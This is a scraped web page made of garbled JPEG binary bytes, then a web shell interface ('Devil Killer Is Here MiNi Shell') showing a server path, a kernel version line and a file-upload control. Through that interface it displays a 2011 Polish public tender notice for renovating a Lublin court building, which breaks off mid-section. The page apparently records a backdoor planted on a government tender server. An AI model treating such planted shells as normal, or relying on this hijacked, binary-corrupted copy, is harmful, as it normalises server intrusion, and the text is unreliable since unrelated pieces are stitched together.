JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110504/99658-N-2011.html

<p class="kh_header"><b>Lublin: Remont budynku Sądu Rejonowego Lublin-Zachód w Lublinie
przy ul. Krakowskie Przedmieście 76.</b><br>
<b>Numer ogłoszenia: 99658 - 2011; data zamieszczenia: 04.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Lublinie , ul. Krakowskie Przedmieście 43, 20-076 Lublin, woj. lubelskie, tel. 081 5359164, faks 081 5359164.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> lublin.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku Sądu Rejonowego Lublin-Zachód w Lublinie
przy ul. Krakowskie Przedmieście 76..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu budynku Sądu Rejonowego Lublin-Zachód w Lublinie przy ul. Krakowskie Przedmieście 76

KLASYFIKACJA ROBÓT WG. SŁOWNIKA CPV
45000000-7 Roboty budowlane
45111200-0 Przygotowanie terenu pod budowę i roboty ziemne
45260000-7 Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistyczne
45422000-1 Roboty ciesielskie
45223500-1 Konstrukcje z betonu zbrojonego
45262500-6 Roboty murarskie i murowe
45320000-6 Roboty izolacyjne
45453100-8 Roboty renowacyjne
45432000-4 Kładzenie i wykładanie podłóg, 
45410000-4 Tynkowanie
45442100-8 Roboty malarskie
45421131-1 Instalowanie drzwi
45311000-0 Roboty w zakres przewodów instalacji elektrycznych oraz opraw elektrycznych
45330000-9 Hydraulika i roboty sanitarne
ZAKRES PRAC OBEJMUJE:
1. Roboty rozbiórkowe i przygotowawcze w tym m.in.:
- demontaż starego pokrycia dachowego, częściowy demontaż więźby dachowej, rozkucia ścian, rozbiórka starych stropów drewnianych, remont z odgruzowaniem kominów, rozbiórka schodów wewnętrznych, rozbiórka podłóg wewnętrznych, demontaż starych drzwi wewnętrznych wraz z ich utylizacją, odbicia części tynków wewnętrznych oraz zewnętrznych, demontaż instalacji co wraz z grzejnikami, demontaż instalacji elektrycznych oraz opraw oświetleniowych, demontaż instalacji wod-kan wewnętrznej, rozbiórka części ścian wewnętrznych, rozbiórka cokołu budynku, wykopy zewnętrzne pod wykonanie izolacji pionowych, inne niezbędne do wykonania całości przedmiotu zamówienia.
2. Roboty budowlane w tym m.in.:
- remont konstrukcji więźby dachowej oraz wykonanie nowego pokrycia dachowego wraz z elementami obróbek, ław, pomostów, remontem kominów, murów ogniowych, reperacja elewacji oraz gzymsów, remont cokołu z piaskowca wraz z jego impregnacją, wykonanie pionowych izolacji zewnętrznych wraz z warstwą ocieplenia, wykonanie nowych schodów żelbetowych, wykonanie nowych stropów typu wps, wykonanie izolacji przeciwwilgociowych przyziemia, montaż nowej stolarki drzwiowej, remont posadzek wewnętrznych z wykonaniem warstw wykończeniowych z kamienia naturalnego typu granit oraz parkiet, konserwacja i odtworzenie sztukaterii, montaż świetlików stropowych oraz dachowych, renowacja elementów metalowych, renowacja zewnętrznej stolarki drzwiowej, renowacja kominków oraz elementów metalowych, wykonanie nowych tynków wraz z gładziami, malowanie ścian oraz sufitów, wykonanie zabudowy meblowej wejścia głównego, zakup i montaż windy osobowej oraz towarowej, inne niezbędne do wykonania całości przedmiotu zamówienia
3. Roboty elektryczne w tym m.in.:
- roboty demontażowe istniejącej instalacji elektrycznej, wykonanie kompletnej instalacji elektrycznej wraz instalacją dedykowaną do zasilania komputerów, wykonanie okablowania strukturalnego (komputery i telefony), wykonanie instalacji odgromowej wraz z uziomem otokowym, montaż wybranych lamp z demontażu,  wykonanie instalacji LAN, CCTV, SWiN, oddymiania, SAP, inne niezbędne do wykonania całości przedmiotu zamówienia,
4. Roboty sanitarne w tym m. in.:
- remont instalacji CO wraz z wymianą grzejników, instalacja wentylacji mechanicznej i klimatyzacji w wybranych pomieszczeniach, remont instalacji wod-kan oraz inne niezbędne do wykonania całości przedmiotu zamówienia,
5. Inne niezbędne do wykonanie całości zamówienia.
Wszystkie roboty należy wykonać zgodnie z dokumentacją projektową, w której skład wchodzą:
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie - część architektoniczna,
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie - część konstrukcyjna,
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie - część ogólnobudowlana izolacja ścian przyziemia budynku,
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie - projekt organizacji budowy,
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie - instalacje elektryczne,
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie - budowa systemu telewizji dozorowej (CCTV),
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie -  branża: teletechniczna okablowanie strukturalne,
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie -  branża: teletechniczna system oddymiania,
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie -  branża: teletechniczna SWiN i KD,
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie -  branża: teletechniczna system sygnalizacji pożaru,
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie -  branża: sanitarna, instalacja centralnego ogrzewania i wentylacji mechanicznej,
- Projekt budowlano-wykonawczy remontu budynku Sądu Rejonowego w Lublinie -  branża: sanitarna instalacja wod-kan i c.w.
- Aneks projektu wykonawczego obejmujący zmiany funkcjonalne niektórych pomieszczeń w stosunku do projektu remontu budynku Sądu Rejonowego w Lublinie Krakowskie Przedmieście 76 - branża architektoniczna,
- Aneks projektu wykonawczego obejmujący zmiany funkcjonalne niektórych pomieszczeń w stosunku do projektu remontu budynku Sądu Rejonowego w Lublinie Krakowskie Przedmieście 76 - branża teletechniczna,
- Aneks projektu wykonawczego obejmujący zmiany funkcjonalne niektórych pomieszczeń w stosunku do projektu remontu budynku Sądu Rejonowego w Lublinie Krakowskie Przedmieście 76 - branża elektryczna,
- Aneks nr 2 do projektu wykonawczego remontu budynku Sądu Rejonowego w Lublinie Krakowskie Przedmieście 76 obejmujący: 1. Instalację klimatyzacji sal rozpraw i gabinetów na II piętrze budynku, 2. Aranżację holu wejściowego oraz pomieszczeń po zlikwidowanym bufecie na poziomie parteru, Branża: sanitarna - klimatyzacja,
- Aneks nr 2 do projektu wykonawczego remontu budynku Sądu Rejonowego w Lublinie Krakowskie Przedmieście 76 obejmujący: 1. Instalację klimatyzacji sal rozpraw i gabinetów na II piętrze budynku, 2. Aranżację holu wejściowego oraz pomieszczeń po zlikwidowanym bufecie na poziomie parteru, Branża: architektoniczna,
- Aneks nr 2 do projektu wykonawczego remontu budynku Sądu Rejonowego w Lublinie Krakowskie Przedmieście 76 obejmujący: 1. Instalację klimatyzacji sal rozpraw i gabinetów na II piętrze budynku, 2. Aranżację holu wejściowego oraz pomieszczeń po zlikwidowanym bufecie na poziomie parteru, Branża: elektryczna,
- specyfikacje techniczne wykonania i odbioru robót,
- przedmiary robót (funkcja pomocnicza),

Należy przewidzieć możliwość udzielenia zamówień uzupełniających zgodnie z art. 67 ust.1 pkt. 6 ustawy PZP.
Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy PZP, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego. Udzielenie zamówień uzupełniających może nastąpić na podstawie odrębnej umowy z Wykonawcą, przy czym Zamawiający dopuszcza ich rozliczenie wyłącznie na podstawie danych wyjściowych do kosztorysowania wynikających z oferty Wykonawcy z kosztorysem ofertowym lub według cen korzystniejszych np. wg cennika Sekocenbud z kwartału poprzedzającego wykonanie robót.
Przy organizacji budowy należy wziąć pod uwagę konieczność wykonania w 2011 roku remontu dachu wraz z wymianą poszycia dachowego, oraz wymiany stropów.
Zamawiający przewiduje możliwość zmiany umowy w następujących sytuacjach:
1) w przypadku przerw w realizacji robót z winy Zamawiającego, Zamawiający dopuszcza wydłużenie terminu realizacji umowy o czas przerwy, a także możliwość zwiększenia wynagrodzenia ryczałtowego o współczynnik wzrostu cen robót budowlanych wg. wydawnictwa Secocenbud Zagregowane Wskaźniki Waloryzacyjne tabela dla budynku administracyjno-biurowego.
2) w przypadku wzrostu podatku VAT Zamawiający uwzględni zwiększenie kwoty ryczałtowej o stosowny procent wzrostu podatku, przy czym zmiana będzie mogła objąć wyłącznie cześć wynagrodzenia za roboty budowlane, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.
Powyższe ewentualne zmiany zostaną wprowadzone aneksami do umowy i dokonane po przeprowadzeniu stosownych uzgodnień przez strony umowy.
Wykonawca w ofercie uwzględnia koszty energii elektrycznej, wody i odprowadzania ścieków, centralnego ogrzewania, oraz zabezpieczenie obiektu oraz profesjonalną ochronę przez cały okres realizacji zadania, również w okresie przerw w realizacji robót. Wykonawca każdorazowo od otrzymania od Zamawiającego faktur za zużyte media, dokona zwrotu wartości do 7 dni od otrzymania faktury. W przeciwnym wypadku Zamawiający potrąci należność za media z wystawionej przez Wykonawcę faktury za zrealizowane roboty budowlane. Regulowanie opłat za media przez Wykonawcę Zamawiającemu kończy się z chwilą podpisania końcowego protokołu odbioru robót pomiędzy stronami.
Zamawiający dopuszcza wykonanie robót przez podwykonawców.
Wykonawca jest zobowiązany na własny koszt zorganizować zaplecze techniczne oraz socjalne budowy w miejscu wskazanym przez Zamawiającego.
Wykonawca zobowiązany jest do wizji lokalnej przedmiotu zamówienia w celu rzetelnego opracowania oferty.
SPROSTOWANIA ( UZUPEŁNIENIA) DLA WYKONAWCY ZWIĄZANE Z DOKUMENTACJĄ:
1.	W wycenie ująć pokrycie blachą cynkowo-tytanową gr. 0,7 mm,
2.	W wycenie ująć montaż taśm ze szpilkami dla zabezpieczenia blachy przed ptactwem (gzyms),
3.	W wycenie ująć montaż na poddaszu (na całej długości budynku) podłogi szerokości 120 cm z deski 32 mm z tarcicy wraz z balustradami z krawędziaków (późniejsza swobodna komunikacja użytkownika),
4.	W wycenie ująć matę strukturalną (pod blachę na dachu) np. mata Permoforte z oplotem polipropylenowym lub inna równoważna,
5.	W wycenie ująć wykonanie silikonowania styków pomiędzy wykonaną obróbką blacharską (która wchodzi w mur/ścianę) oraz ścianą,
6.	W wycenie ująć zakup i montaż systemowych rurowych barier śniegowych montowanych w pasie nadrynnowym do rąbka stojącego bez przewiercania blachy,
7.	W wycenie ująć oczyszczenie z rdzy wszystkich elementów stalowych więźby dachowej wraz z naprawą zamocowań oraz dokręceniem elementów stalowych oraz pomalowaniem farbami antykorozyjnymi,
8.	W wycenie ująć usztywnienie węzłów połączeń ciesielskich stalowymi złączami do drewna np. złącza BMF lub inne równoważne,
9.	W wycenie ująć odgrzybienie oraz otynkowanie elementów ścian kolankowych wraz z ich pomalowaniem, częściowe przemurowanie ścian kolankowych oraz miejscowe naprawienie uszkodzonych w murze powierzchni,
10.	Przy wykonaniu deskowania pod blachę można zamiennie zastosować również płytę OSB,
11.	W wycenie ująć - roboty elewacyjne. 
- rusztowanie dookoła elewacji wraz z osiatkowaniem, daszkami przy wejściach do budynku, instalacją odgromową, czasem pracy rusztowań,
- uzupełnienie tynku z terrazytu  wraz z malowaniem, (zakładane zgodnie z dokumentacją ściągi na elewacji oraz wylewane wieńce mogą znacząco uszkodzić elewację), kolorystyka elewacji powinna zostać ujednolicona,
- uzupełnienie profili gzymsu,
- uzupełnienie profili ciągnionych całej elewacji,
- renowacja 2 balkonów kamiennych (czyszczeniem, dłutowaniem, odgrzybianiem, impregnacją końcową),
- zdjęcie/odbicie płyt z piaskowca z cokołu budynku,
- odbicie narzutu cementowego na cokole budynku,
- wykonanie izolacji cokołu z materiału mineralnego w tym samym systemie co izolacja pozioma ścian fundamentowych np. Oxal DS-HS lub inny równoważny,
- wykonanie systemu mocowań do piaskowca np. typu Halfen lub inny równoważny, 
- montaż nowych płyt z piaskowca gr 4 cm wraz z nakrywami,
- wywóz gruzu,
- impregnacja piaskowca,
12.	W wycenie ująć wykonanie izolacji pionowej przeciwwilgociowej piwnic od zewnątrz oraz rezygnację z wykonania izolacji pionowej oraz rastrowej od wewnątrz (pozostaje więc izolacja pionowa z zewnątrz oraz iniekcja od środka):
- rozebranie kostki brukowej dookoła budynku na szerokość niezbędną do wykonania wykopu,
- wykopy odcinkami wokół budynku na głębokość ok. 4 mb wraz z ich pełnym deskowaniem,
- oczyszczenie murów wraz z ich częściowym uzupełnieniem i przemurowaniem,
- odgrzybianie,
- uzupełnienie spoin w cegle,
- wykonanie warstwy sczepnej,
- wykonanie izolacji z materiału bitumicznego elastycznego w tym samym systemie co izolacja pozioma ścian fundamentowych np. Nafuflex 245 (do gr ok. 5 mm wraz z dodatkowym ułożeniem warstwy siatki wzmacniającej izolację),
- wykonanie ocieplenia ściany zewnętrznej ze styropianu extrudowanego gr 5 cm na całej wysokości ściany w gruncie,
- wykonania uziomu otokowego dla instalacji odgromowej oraz połączenie z zwodami pionowymi na elewacji,
- zasypanie wykopów piaskiem,
- wywóz ziemi i gruzu,
13.	W wycenie robót związanych z wykonaniem izolacji poziomej metodą iniekcji nie ujmować wykonania izolacji ściany na długości 12,84 mb (izolację wykonano w 2009 roku) - widok rzutu z wykonaną izolacją w załączeniu do przetargu, 
14.	W wycenie ująć renowację zewnętrznej stolarki drzwiowej oraz wewnętrznej w wiatrołapach: dokładne umycie całości,  opalenie , ponowne malowanie, większe rysy - wypełnienie masą wypełniającą do drewna, oprócz w/w wykonać gruntowne oszlifowanie elementów stolarki za pomocą szlifierki elektrycznej, malowanie stolarki ze zniszczoną, spękaną farbą wykonujemy po gruntownym opaleniu i wyszlifowaniu profili za pomocą specjalnego narzędzia można usunąć zgrubienia farby po wielokrotnym malowaniu w wewnętrznych narożnikach profili drewnianych wymianie zbutwiałych elementów, zabrudzone, zawilgocone, rozkruszone narożniki ścian po wzmocnieniu należy uzupełnić pianką instalacyjną nie domykające się okucia mosiężne/żeliwne po oczyszczeniu należy pomalować i nasmarować, zamki, zawiasy i klamki do renowacji,
15.	W wycenie ująć wykonanie gładzi na ścianach oraz stropach w pomieszczeniach parteru, I oraz II piętra,
16.	W wycenie ścianek działowych, należy przyjąć podwójną płytę g-k w celu wykonania sztywniejszej ścianki,
17.	W wycenie ująć wykonanie w salach rozpraw podestów w technologii podłóg podniesionych z płytami ognioodpornymi 60 x 60 cm obłożonymi płytkami granitowymi/parkietem, dotyczy to również boków podestów, podest szerokości 2,2 m,
18.	W wycenie ująć wykonanie w pomieszczeniu serwerowni systemowej podłogi podniesionej np. Knauf Integral lub inne równoważne,
19.	W wycenie ująć wymianę parapetów wewnętrznych nad grzejnikami na konglomerat gr 4 cm (dotyczy parapetów przy holach, klatkach schodowych itd. - nie dotyczy parapetów przyokiennych),
20.	W wycenie ująć wykonanie nowych zabudów grzejników z maty rattanowej w ramach z drewna (zabudowa z 3 stron) np. typ Rafalo,
21.	W wycenie ująć dostawę i montaż w pomieszczeniach biurowych i korytarzach listew odbojowych ściennych szer. 25 cm oddylatowanych od ściany i zamontowanych na stelażu (listwy na wysokości oparcia krzeseł) w kolorystyce wewnętrznej stolarki drzwiowej,
22.	W wycenie ująć dostawę i montaż w narożach ścian komunikacyjnych, holach, przejściach itd. narożnych listew odbojowych typu j.w.,
23.	W wycenie ująć demontaż starych regałów stacjonarnych oraz wywóz na złom,
24.	W wycenie ująć montaż odbojników drzwiowych OD-RZ-050 odbój podłogowy wzm. aluminium srebrny np. SPARTA lub inny równoważny,
25.	W wycenie ująć dostawę i montaż interkomu kasowego,
26.	W wycenie ująć wykonanie cokolików kamiennych, drewnianych, typu gres itd. zgodnie z materiałami użytymi na posadzkach,
27.	W wycenie ująć wykonanie zabudów g-k wraz z rewizjami instalacji centralnego ogrzewania (zabudowy rurociągów),
28.	W wycenie ująć wszelkie przejścia instalacyjne należy je zabezpieczyć do odpowiedniego stopnia odporności ogniowej,
29.	W wycenie ująć wyposażenie widny w kurtynę świetlną, oraz panel z kontrolą dostępu, 
30.	W wycenie ująć odpowiednie szczelne zabezpieczenie istniejących regałów przesuwnych na czas remontu, 
31.	W wycenie ująć przeniesienie starego zabytkowego sejfu z I piętra do pomieszczenia kasy na parterze,
32.	Balustrady całego budynku należy podać zabiegom konserwatorskim łącznie z uzupełnieniem elementów brakujących,
33.	Nawiewniki w ścianach zewnętrznych oraz wyczystki i drzwiczki rewizyjne na
dawnych przewodach dymowych powinny po powtórnym zamontowaniu po zabiegu konserwatorskim powinny być sprawne technicznie,
34.	W pomieszczeniach aresztu ścianki wraz z drzwiami do pomieszczeń (okratowanie) powinno uniemożliwiać osobom konwojowanym swobodne przekładanie rak poza pomieszczenie aresztu,
35.	Należy zabezpieczyć poprzez okratowanie oświetlenia, grzejników oraz innych elementów w sposób uniemożliwiający bezpośredni dostęp przez osoby przebywające w areszcie,
36.	W drewnianych oknach zewnętrznych należy zamontować nawiewniki higrosterowane w kolorze stolarki okiennej (min 1 nawiewnik na jedno pomieszczenie),
37.	Zdemontowane oprawy oświetleniowe (z wyłączeniem starych lamp do renowacji) Wykonawca przekaże protokolarnie użytkownikowi obiektu,
38.	Klapy oddymiające od 1-6 należy dostarczyć wraz z fabrycznie dobranym i zamontowanym siłownikiem elektrycznym,
39.	W wycenie uwzględnić system oddymiania klatki schodowej od strony ulicy Hipotecznej obejmujący montaż siłowników dla 2 kompletów drzwi dwuskrzydłowych napowietrzających (pomieszczenie 121) i siłownik (z przystosowaniem naświetla okna na najwyższej kondygnacji klatki schodowej na uchylne), centralkę oddymiania oraz urządzenie kontrolno-sterujące EKS wraz z niezbędnym oprzewodowaniem (analogicznie jak na klatkach - pom. 225 i  232)
40.	W wycenie instalacji oddymiania uwzględnić wykonanie pomiarów i prób montażowych.
41.	W wycenie instalacji sygnalizacji pożaru należy uwzględnić urządzenia kontrolno-sterujące EKS oraz certyfikowane zasilacze przeznaczone do zasilania klap ppoż. na kanałach wentylacyjnych (16 sztuk) z podtrzymaniem 72 godzinnym wraz z niezbędnym oprzewodowaniem. 
42.	 Klapy ppoż. w kanałach wentylacyjnych powinny być sterowane napięciem 24VDC.
43.	 W wycenie instalacji sygnalizacji pożaru uwzględnić wykonanie pomiarów i prób montażowych oraz szkolenie obsługi.
44.	W wycenie SSWiN i KD uwzględnić dodatkowe 4 komplety kontroli dostępu (składające się między innymi z ekspandera, czytnika, elektrozaczepu, przycisków, oprzewodowania) wpięte w system.
45.	W wycenie SSWiN i KD uwzględnić zasilacze buforowe do kontroli dostępu na każdej kondygnacji.
46.	W wycenie SSWiN i KD uwzględnić wykonanie pomiarów i prób montażowych oraz szkolenie obsługi.
47.	W wycenie CCTV : kamery nr 1 i 5 (obrotowe) powinny posiadać min. 530TVL.
48.	W wycenie CCTV : kamery nr 11, 13, 14, 15, 16, 17, 18, 19 20, 21, 22, 23, 24, 25, 26, 17, 28, 29 i 31 powinny posiadać min. 540TVL.
49.	W wycenie CCTV: Rejestrator cyfrowy powinien posiadać dysk min. 1TB.
50.	W wycenie CCTV uwzględnić monitory o rozdzielczości min. 1280x1024, kontraście 800:1, jasności 300cd m2, przekątnej ekranu 19cali.
51.	W wycenie CCTV uwzględnić montaż zabezpieczeń typu DEHN UGKF/BNC i DEHN NM DK 280 na torach kamer zewnętrznych (10 kpl)
52.	W wycenie CCTV uwzględnić wykonanie pomiarów i prób montażowych oraz szkolenie obsługi.
53.	W wycenie instalacji elektrycznych uwzględnić zasilanie kamer z tablic piętrowych na I piętrze (po jednym obwodzie z każdej tablicy).
54.	Instalacje elektryczne; w tablicy głównej należy przewidzieć miejsce na montaż wraz z  zestawem do kompensacji mocy biernej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zmiany umowy w przypadku:
14.3.1 aktualizacji rozwiązań ze względu na postęp technologiczny (np. wycofanie z obrotu urządzeń lub materiałów); zmiana nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której,  był dokonany wybór wykonawcy;
14.3.2 w przypadku przerw w realizacji robót z winy Zamawiającego, Zamawiający dopuszcza wydłużenie terminu realizacji umowy o czas przerwy, a także możliwość zwiększenia wynagrodzenia ryczałtowego o współczynnik wzrostu cen robót budowlanych wg. katalogów Secocenbud;
14.3.3 w przypadku zmiany podatku VAT Zamawiający uwzględni zmianę kwoty ryczałtowej o stosowny procent zmiany podatku, przy czym zmiana będzie mogła objąć wyłącznie cześć wynagrodzenia za roboty budowlane, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.26.00.00-7, 45.42.20.00-1, 45.22.35.00-1, 45.26.25.00-6, 45.32.00.00-6, 45.45.31.00-8, 45.43.20.00-4, 45.41.00.00-4, 45.44.21.00-8, 45.42.11.31-1, 45.31.10.00-0, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1Wadium należy wnieść w wysokości:  150 000 zł. (słownie sto pięćdziesiąt tysięcy)
przed upływem terminu składania ofert .
9.2.   Zamawiający żąda dowodu wniesienia wadium (np. kopii przelewu) dołączonego do oferty. Jeżeli wadium ma formę gwarancji lub poręczenia, Zamawiający zaleca jego składanie w oryginale. Zamawiający wymaga złożenia oryginału gwarancji lub oryginału poręczenia w zakresie wniesienia wadium w przypadku, gdy pozostawienie oryginału w posiadaniu Wykonawcy może uniemożliwiać Zamawiającemu dochodzenie roszczeń przysługujących z gwarancji- poręczenia oraz jeżeli stwarza to zagrożenie wygaśnięcia- odwołania ustanowionego w ten sposób zabezpieczenia interesu Zamawiającego. W innym przypadku wystarczająca jest kopia dokumentu poświadczona (potwierdzona) za zgodność z oryginałem przez osobę-osoby uprawnioną-uprawnione do reprezentowania wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
